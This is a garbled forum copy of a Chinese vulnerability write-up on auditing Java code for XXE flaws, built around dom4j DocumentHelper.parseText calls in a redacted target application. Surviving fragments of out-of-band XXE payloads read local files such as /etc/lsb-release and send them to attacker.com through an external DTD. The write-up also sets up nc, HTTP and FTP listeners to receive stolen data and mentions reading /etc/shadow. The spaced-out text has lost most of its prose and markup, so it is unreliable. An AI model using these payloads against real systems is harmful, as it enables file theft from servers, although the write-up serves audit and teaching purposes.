[19462] 2019-03-12_漏洞经验分享丨Java审计之XXE(下)

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-18
2019-03-12_漏洞经验分享丨Java审计之XXE(下) J a v a X X E i   2 0 1 9 - 0 3 - 1 2 X X E B l i n d   X X E O O B - X X E X X E     J a v a X X E B l i n d X X E B l i n d   X X E O O B - X X E X X E P a y l o a d X M L X X E X X E W e b B l i n d   X X E 使 X M L O O B - X X E 使 O O B r e q u e s t :
X M L % f i l e / e t c / l s b - r e l e a s e X M L h t t p : / / a t t a c k e r . c o m / e v i l . d t d D T D D T D a l l % s e n d ;   U R L h t t p : / / a t t a c k e r . c o m / ? c o l l e c t = D I S T R I B _ I D = U b u n t u   U R L & s e n d ;   B l i n d   X X E B l i n d   X X E 使 U R L 访 使 p a y l o a d
n c   - l v v   p o r t   X X E B l i n d   O O B   X X E p h p X X E x m l . p h p t e s t . d t d p a y l o a d
  p a y l o a d       % r e m o t e ; % i n t ; % s e n d ; % r e m o t e   t e s t . d t d     t e s t . d t d     % i n t     t e s t . d t d     % f i l e ,   % f i l e     % f i l e     % s e n d   (   % ,   h t m l   % )   % s e n d ;     v p s     X X E   1 2 0 1 2 9 O r a c l e   J D K g o p h e r   O r a c l e   J D K   1 . 7   u p d a t e   7   O r a c l e   J D K   1 . 6   u p d a t e   3 5   2 l i b x m l     P H P     x m l   n e t d o c
X X E b u r p  
b u r p X S S S Q L S S R F X X E 使 o r g . d o m 4 j . D o c u m e n t H e l p e r D o c u m e n t H e l p e r . p a r s e T e x t x x x * * * * * * . j a v a   L i n e   3 0 3 :         d o c u m e n t   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l ) ; x x x * * * X m l P a r s e r . j a v a   L i n e   5 1 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l S t r ) ; x x x * * * * * * T a s k . j a v a   L i n e   3 5 0 :         D o c u m e n t   d o c u m e n t   =   D o c u m e n t H e l p e r . p a r s e T e x t ( r e s u l t ) ; x x x * * * * * * A c t i o n . j a v a   L i n e   2 3 7 :         D o c u m e n t   d o c u m e n t   =   D o c u m e n t H e l p e r . p a r s e T e x t ( m a p D a t a F o r O u t ) ; x x x * * * x x x A c t i o n . j a v a   L i n e   2 5 9 :         D o c u m e n t   d o c u m e n t   =   D o c u m e n t H e l p e r . p a r s e T e x t ( m a p D a t a F o r O u t ) ; x x x * * * x x x . j a v a   L i n e   1 2 0 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( p o l i c y X m l . r e p l a c e A l l ( " _ l n x " ,   " " ) ) ; L i n e   1 2 5 :         d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( n o d e . a s X M L ( ) ) ; x x x * * * t i o n . j a v a   L i n e   1 0 9 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l S t r ) ; x x x * * * . j a v a   L i n e   5 8 :         d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l ) ;   / /   X M L x x x * * * . j a v a   L i n e   9 2 :         d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l ) ; L i n e   9 7 :         o l d D o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( v a i l d X m l ) ;
x x x * * * O b j C o n v e r t e r . j a v a   L i n e   1 7 3 :           D o c u m e n t   d o c u m e n t   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l ) ; x x x * * * . j a v a   L i n e   9 4 9 :           d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( i n f o r . g e t C o n t e n t ( ) ) ; x x x * * * U t i l i t y . j a v a   L i n e   1 2 0 3 :           D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( r e s u l t ) ; x x x * * * x x x S e r v i c e . j a v a   L i n e   1 7 7 :           D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( r e q u e s t H e a d e r ) ; x x x * * * E v e n t P a r s e r . j a v a   L i n e   8 3 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l S t r ) ; L i n e   1 8 5 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l S t r ) ; L i n e   2 2 9 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l S t r ) ; L i n e   3 0 6 :         D o c u m e n t H e l p e r . p a r s e T e x t ( c o n t e n t X m l ) ) . r e p l a c e A l l ( " < " ,   " < " ) . r e p l a c e A l l ( " > " ,   " > " ) . r e p l a c e A l l ( " = = a m p ; " ,     x x x * * * X M L M e s s a g e U t i l . j a v a   L i n e   2 4 :         d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l ) ; L i n e   1 3 1 :         t e m p D o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l ) ; L i n e   2 2 4 :         d o c u m e n t   =   D o c u m e n t H e l p e r . p a r s e T e x t ( " < a > < b > < / b > < / a > " ) ; x x x * * * X m l P a r s e r . j a v a   L i n e   5 1 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l S t r ) ; x x x * * * . j a v a   L i n e   2 4 4 :         D o c u m e n t   d o c   =   D o c u m e n t H e l p e r . p a r s e T e x t ( x m l S t r ) ; x x x * * * X M L M e s s a g e U t i l . j a v a 使 o r g . d o m 4 j . D o c u m e n t H e l p e r . p a r s e T e s t X M L w e b . x m l A x i s S e r v l e t s e r v l e t - m a p p i n g U R L
访 U R L 访 A x i s S e r v l e t X X E h t t p s : / / i p / x x x / s e r v l e t / A x i s S e r v l e t h t t p s : / / i p / * * * / s e r v l e t / A x i s S e r v l e t P O C 访 1 x x e _ t e s t t e s t . d t d 2 x x e _ t e s t 8 0 8 0 P y t h o n   - m   S i m p l e H T T P S e r v e r   8 0 8 0 3 f t p 2 1 P y t h o n   x x e - f t p . p y
4
/ e t c / s h a d o w 使 X X E i n j e c t o r   X X E 使
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则